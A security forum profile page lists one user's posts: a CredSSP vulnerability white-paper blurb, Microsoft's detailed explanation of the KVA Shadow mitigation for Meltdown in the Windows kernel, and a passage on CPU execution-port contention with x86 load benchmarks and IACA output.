Jump to content

Nytro

Administrators
  • Posts

    18772
  • Joined

  • Last visited

  • Days Won

    730

Everything posted by Nytro

  1. https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/
  2. From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886] In March 2013 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability that was discovered by Preempt. This vulnerability can be classified as a logical remote code execution (RCE) vulnerability. The vulnerability consists of a design flaw in CredSSP, which is a Security Support Provider involved in the Microsoft Remote Desktop and Windows Remote Management (Including Powershell sessions). An attacker with complete Man in the Middle (MITM) control over such a session can abuse it to run an arbitrary code on the target server on behalf of the user! This vulnerability affects all windows versions. Download this white paper to learn: How Preempt Researchers found the vulnerability How we were able to exploit authentication in MS-RDP What you need to do to protect your organization Download now. Sursa: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
      • 1
      • Upvote
  3. KVA Shadow: Mitigating Meltdown on Windows swiat March 23, 2018 On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”). KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post. Vulnerability description & background The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by way of raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode code. Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architecturalstate of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time. Out of order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or otherwise may have left additional traces of their execution in the processor’s caches. This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory. Operating system implications Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode. A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. On a historical note, some operating systems previously have implemented similar mechanisms for a variety of different and unrelated reasons: For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel in order to provide a 4GB virtual address space to user mode, and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels. KVA shadow implementation in the Windows kernel While the design requirements of KVA shadow may seem relatively innocuous, (privileged kernel-mode memory must not be mapped in to the address space when untrusted user mode code runs) the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes maintainability of code in both KVA shadow and non-KVA-shadow configurations. This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures. This is due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling. Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation. The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode. Trap handling and system service call dispatching overview and retrospective As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors, traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load up on a ring transition to ring 0 (kernel mode) code. This field is traditionally updated by the kernel on context switch, and several other related internal events; when a switch to a different thread occurs, the processor KTSS64.Rsp0 field is updated to point to the base of the new thread’s kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread’s stack. The exception to this rule is that of system service calls, which typically enter the kernel with a “syscall” instruction; this instruction does not switch the stack pointer and it is the responsibility of the operating system trap handling code to manually load up an appropriate kernel stack pointer. On typical kernel entry, the hardware has already pushed what is termed a “machine frame” (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt-return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags on the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread. KVA shadow trap and system service call dispatching design considerations With a basic understanding of how traps are handled without KVA shadow, let’s dive into the details of the KVA shadow-specific considerations of trap handling in the kernel. When designing KVA shadow, several design considerations applied for trap handling when KVA shadow were active, namely, that the security requirements were met, that performance impact on the system was minimized, and that changes to the trap handling code were kept as compartmentalized as possible in order to simplify code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel’s trap handling facilities in the future. When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only transition kernel pages that can be permitted to exist (or be “shadowed into”) in the user address space are only those that hold contents that are “safe” to disclose to user mode. The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS. This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel’s trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required. The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor, the first of which represents the stack used for “normal” kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not use all 7 possible IST stacks presently). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields point to the n-th KTRANSITION_STACK for that processor. For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, that the current stack is both shadowed into the user mode address space, and does not contain sensitive memory contents that would be risky to disclose to user mode. However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow in order to avoid any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode already are executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below). Fielding a trap with KVA shadow active Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur prior to the normal trap handling code in the kernel being invoked for a kernel entry trap events. In addition, there is a similar set of tasks related to KVA shadow that must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur: The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor. The processor’s address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value must be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only “safe” contents maintains a copy of the current processor’s kernel CR3 value for easy access to the KVA shadow trap dispatch code. Context switch between address spaces, and process attach/detach update the corresponding KPRCB fields with the new CR3 value on process address space changes. The machine frame previously pushed by hardware as a part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack, to the per-kernel-thread stack for the current thread. The current stack must be switched to the per-kernel-thread stack. At this point, the “normal” trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded). Roughly speaking, the inverse sequence of events must occur on normal kernel exit; the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode. System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly specially, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame needs be copied on kernel entry and kernel exit, but the other basic steps must still be performed. Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault type trap events, because these events may interrupt even normally uninterruptable code. This means that they could even interrupt the normally uninterruptable KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event. These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state due to the indeterminate state of the machine at the time in which these events may occur, and must preserve the pre-existing GS base or CR3 values. At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel’s .text code section, and it is desirable to minimize the amount of code that needs be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image. Note that one implication of this design choice is that KVA shadow does not protect against attacks against kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers), and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code. Memory management considerations for KVA shadow Now that KVA shadow is able to handle trap entry and trap exit, it’s necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces and share the same underlying physical pages in both address spaces, and all such allocations are considered nonpageable and are treated as though they have been locked into memory. The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process’s kernel address space top level page directory page to the process’s user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead only correspond to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity. In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel stacks.) Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces, as any updates occur, and access bit handling for working set aging and other purposes must logically OR the access bits from both user and kernel address spaces together if a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory page if a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge-cases where top-level page directory pages are manipulated. Finally, no general purpose kernel allocations can be marked as “global” in their corresponding leaf page table entries by the kernel, because processors susceptible to rogue data cache load cannot observe any cached virtual address translations for any privileged kernel pages that could contain sensitive memory contents while in user mode, for KVA shadow protections to be effective, and such global entries would still be cached in the processor translation buffer (TB) across an address space switch. Booting is just the beginning of a journey At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow. However, there’s much more that’s involved beyond just trap handling and memory management: For example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base. So far, we have only touched on the basics of the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We’re far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we’ll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates to address rogue data cache load. Performance optimizations One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement, and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory. Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer, (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system’s page table hierarchy if the requisite translation is already cached in the processor TB. Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages. KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done so, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load. Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation, but several techniques have been developed to substantially reduce the cost. PCID acceleration The first optimization, the usage of PCID (process-context identifier) acceleration is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, and which had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached the processor’s TB; then, on address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires that the current address space’s PCID to match that of any cached translation in the TB for the purposes of matching any translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB. On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces. This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads, substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition. On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more “traditional” usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor-interrupts) to be sent to a potentially much larger set of processors, specifically being all of those that had previously loaded a given PCID, which in and of itself is a performance trade-off due to the cost involved in TB flush IPIs. It’s important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization). User/global acceleration Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors, and current Intel Atom family processors do not provide hardware support for PCID and thus cannot take advantage of that PCID support to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the “global” page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is “global” to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations including global translations is provided by the processor, for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.) Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit, thus, elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity. In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed “user/global acceleration”. Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global. Privileged process acceleration The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications. KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow “kernel” address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications. Optimizations are ongoing The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort. Driver and application compatibility A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system. Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before. A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, that necessitated a security update which changed how the operating system manages memory and trap and exception dispatching, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications. Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure. Conclusion Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor. In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity, and especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities. Ken Johnson, Microsoft Security Response Center (MSRC) Sursa: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
  4. Understanding CPU port contention. 21 Mar 2018 I continue writing about performance of the processors and today I want to show some examples of issues that can arise in the CPU backend. In particular today’s topic will be CPU ports contention. Modern processors have multiple execution units. For example, in SandyBridge family there are 6 execution ports: Ports 0,1,5 are for arithmetic and logic operations (ALU). Ports 2,3 are for memory reads. Port 4 is for memory write. Today I will try to stress this side of my IvyBridge CPU. I will show when port contention can take place, will present easy to understand pipeline diagramms and even try IACA. It will be very interesting, so keep on reading! Disclaimer: I don’t want to describe some nuances of IvyBridge achitecture, but rather to show how port contention might look in practice. Utilizing full capacity of the load instructions In my IvyBridge CPU I have 2 ports for executing loads, meaning that we can schedule 2 loads at the same time. Let’s look at first example where I will read one cache line (64 in portions of 4 bytes. So, we will have 16 reads of 4 bytes. I make reads within one cache-line in order to eliminate cache effects. I will repeat this 1000 times: max load capacity ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] dec edi jnz .loop I think there will be no issue with loading values in the same eax register, because CPU will use register renaming for solving this write-after-write dependency. Performance counters that I use UOPS_DISPATCHED_PORT.PORT_X - Cycles when a uop is dispatched on port X. UOPS_EXECUTED.STALL_CYCLES - Counts number of cycles no uops were dispatched to be executed on this thread. UOPS_EXECUTED.CYCLES_GE_X_UOP_EXEC - Cycles where at least X uops was executed per-thread. Full list of performance counters for IvyBridge can be found here. Results I did my experiments on IvyBridge CPU using uarch-bench tool. Benchmark Cycles UOPS.PORT2 UOPS.PORT3 UOPS.PORT5 max load capacity 8.02 8.00 8.00 1.00 We can see that our 16 loads were scheduled equally between PORT2 and PORT3, each port takes 8 uops. PORT5 takes MacroFused uop appeared from dec and jnz instruction. The same picture can be observed if use IACA tool (good explanation how to use IACA): Architecture - IVB Throughput Analysis Report -------------------------- Block Throughput: 8.00 Cycles Throughput Bottleneck: Backend. PORT2_AGU, Port2_DATA, PORT3_AGU, Port3_DATA Port Binding In Cycles Per Iteration: ------------------------------------------------------------------------- | Port | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | ------------------------------------------------------------------------- | Cycles | 0.0 0.0 | 0.0 | 8.0 8.0 | 8.0 8.0 | 0.0 | 1.0 | ------------------------------------------------------------------------- N - port number or number of cycles resource conflict caused delay, DV - Divider pipe (on port 0) D - Data fetch pipe (on ports 2 and 3), CP - on a critical path F - Macro Fusion with the previous instruction occurred | Num Of | Ports pressure in cycles | | | Uops | 0 - DV | 1 | 2 - D | 3 - D | 4 | 5 | | --------------------------------------------------------------------- | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x4] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x8] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0xc] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x10] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x14] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x18] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x1c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x20] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x24] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x28] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x2c] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x30] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x34] | 1 | | | 1.0 1.0 | | | | CP | mov eax, dword ptr [rsp+0x38] | 1 | | | | 1.0 1.0 | | | CP | mov eax, dword ptr [rsp+0x3c] | 1 | | | | | | 1.0 | | dec rdi | 0F | | | | | | | 